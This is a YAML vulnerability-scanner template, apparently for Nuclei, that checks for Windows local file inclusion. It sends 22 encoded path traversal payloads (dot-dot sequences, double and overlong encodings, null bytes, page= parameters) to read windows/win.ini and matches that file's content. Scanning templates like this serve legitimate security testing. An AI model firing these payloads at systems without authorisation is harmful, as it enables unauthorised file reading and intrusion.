id: generic-windows-lfi

info:
  name: Windows - Local File Inclusion
  author: mesaglio,sushantkamble,ritikchaddha
  severity: high
  description: |
    Windows is vulnerable to local file inclusion because of searches for /windows/win.ini on passed URLs.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 22
  tags: azure,windows,lfi,generic

http:
  - method: GET
    path:
      - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini"
      - "{{BaseURL}}/./../../../../../../../../../../windows/win.ini"
      - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini"
      - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini"
      - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini"
      - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini"
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
      - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
      - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
      - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
      - "{{BaseURL}}/..///////..////..//////windows/win.ini"
      - "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini"
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00"
      - "{{BaseURL}}/index.php?page=windows/win.ini"
      - "{{BaseURL}}/index.php?page=windows/win.ini%00"
      - "{{BaseURL}}/index.php?page=../../windows/win.ini"
      - "{{BaseURL}}/index.php?page=....//....//windows/win.ini"
      - "{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini"
      - "{{BaseURL}}/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini"
      - "{{BaseURL}}/../../../../../../../../../windows/win.ini"
      - "{{BaseURL}}/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

# digest: 490a004630440220092f7b0e50b249f320db795850a07f89afe194e27bd596468b7f9b0f5fa31d8802206d74309daf7b3473114e00d28f5a606db4eed3492c6b2c18b9bb3a0ffc0c8808:922c64590222798bb761d5b6d8e72950
